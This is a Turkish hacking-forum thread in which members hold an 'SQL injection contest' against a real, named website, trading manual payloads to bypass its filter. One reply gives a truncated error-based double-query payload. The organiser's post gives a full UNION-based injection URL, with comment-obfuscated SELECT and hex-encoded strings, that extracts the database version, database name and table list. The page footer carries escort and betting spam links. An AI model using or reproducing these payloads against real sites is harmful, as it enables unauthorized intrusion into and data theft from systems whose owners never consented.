SQL İNJECTİON Yarışması

redkit

redkit

Prof Spys-z
Katılım
22 Nis 2013
Mesajlar
880
Tepkime puanı
2
Puanları
0
Arkdaşlar foruma biraz hareketlilik katalım hack forumu olduguna göre hack ile ilgili olacak :D

sql injection ile ilgili olacak , örnek olarak ben bir tane ile başlatacam. Şimdi ben size bir sql acıklı site vercem bunu aşamayı başarmanızı isteyecem ama öle programla scriptle değil manuel :D burada kodu paylaşacaksınız böylelikle diğer arkdaşlarda öğrenmiş olcak. Eğer yapamayan olursa 3-4 gün sonra ben kodlarını yazıp yeni siteye gececez. Başlayalım :

sitemiz : http://www.tuprag.com.tr/page.php?ID=80'

Bu sitedeki sql filtrelemesini aşıp versiyon cekelim. Lütfen kodlarla birlikte... Herkese başarılar
 
Kzsg

Kzsg

Prof Spys-z
Katılım
28 Ara 2013
Mesajlar
946
Tepkime puanı
0
Puanları
0
dokunulmaz kardeşim hertürlü herşekilde alır :D sql yarışmasını
 
redkit

redkit

Prof Spys-z
Katılım
22 Nis 2013
Mesajlar
880
Tepkime puanı
2
Puanları
0
T

TreX1

Yeni Üye
Katılım
12 Şub 2014
Mesajlar
11
Tepkime puanı
0
Puanları
0
redkit' Alıntı:
TreX1' Alıntı:
http://www.tuprag.com.tr/page.php?I...ersion(),floor(rand(0)*2)) having min(0) or 1

form kodları bozdugu için hata veriyor bende resim ekledim

x0MnJ8.png


selametle./
Genişletmek için tıkla ...


kodları kod ekle tagı ile eklersen bozulmazlar :) resimde gördüğüm kadarıyla cekmişsin keşke biraz anlatsaydında arkdaşlara anlamarı için. Başka yoldan yapan cıkar diye şimdilik yeni site vermiyorum yarın bunu acıklayıp yeni siteye geceecez, eline sağlık
Genişletmek için tıkla ...

Eyvallah kardeşim saolasın haklısın herkesin sql cekimi farklıdır boyle guzel konular bulmak cok zor artık formlarda baslattıgın için tesekkur ederim yaptıgım işe gelince double query yontemi ile cektim version u sadece url yi char a cevirdim o kadar
 
redkit

redkit

Prof Spys-z
Katılım
22 Nis 2013
Mesajlar
880
Tepkime puanı
2
Puanları
0
TreX1' Alıntı:
redkit' Alıntı:
TreX1' Alıntı:
http://www.tuprag.com.tr/page.php?I...ersion(),floor(rand(0)*2)) having min(0) or 1

form kodları bozdugu için hata veriyor bende resim ekledim

x0MnJ8.png


selametle./
Genişletmek için tıkla ...


kodları kod ekle tagı ile eklersen bozulmazlar :) resimde gördüğüm kadarıyla cekmişsin keşke biraz anlatsaydında arkdaşlara anlamarı için. Başka yoldan yapan cıkar diye şimdilik yeni site vermiyorum yarın bunu acıklayıp yeni siteye geceecez, eline sağlık
Genişletmek için tıkla ...

Eyvallah kardeşim saolasın haklısın herkesin sql cekimi farklıdır boyle guzel konular bulmak cok zor artık formlarda baslattıgın için tesekkur ederim yaptıgım işe gelince double query yontemi ile cektim version u sadece url yi char a cevirdim o kadar
Genişletmek için tıkla ...

Verdiğiniz bilgi için teşekkür ederiz :)
 
redkit

redkit

Prof Spys-z
Katılım
22 Nis 2013
Mesajlar
880
Tepkime puanı
2
Puanları
0
ilk sorduğumuz sitenin kodları aşağıdadır bypass şeklini kodu inceleyerek anlayabilirsiniz. Yakında yeni site ile devam edilecektir

ss :
10007054_1478024615747141_1443979771_n.png


Kod: 
http://www.tuprag.com.tr/page.php?ID=80 UNION /*%21SELECT*/ NULL,2,3,4,concat%280x3c2f6469763e3c2f6469763e,0x3c623e3c666f6e7420636f6c6f723d7265643e4d616b4d616e203a3a20,version%28%29,0x3c62723e5072696d617279204462203a203c2f666f6e743e,database%28%29,0x3c62723e3c666f6e7420636f6c6f723d7265643e5461626c657320696e205072696d617279204462203a203c2f666f6e743e,group_concat%28/*%21table_name*/ separator 0x3c666f6e7420636f6c6f723d7265643e203a3a203c2f666f6e743e%29,0x3c6469763e%29,6,7,8,9,10,11 from information_schema.tables where table_schema=database%28%29--
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012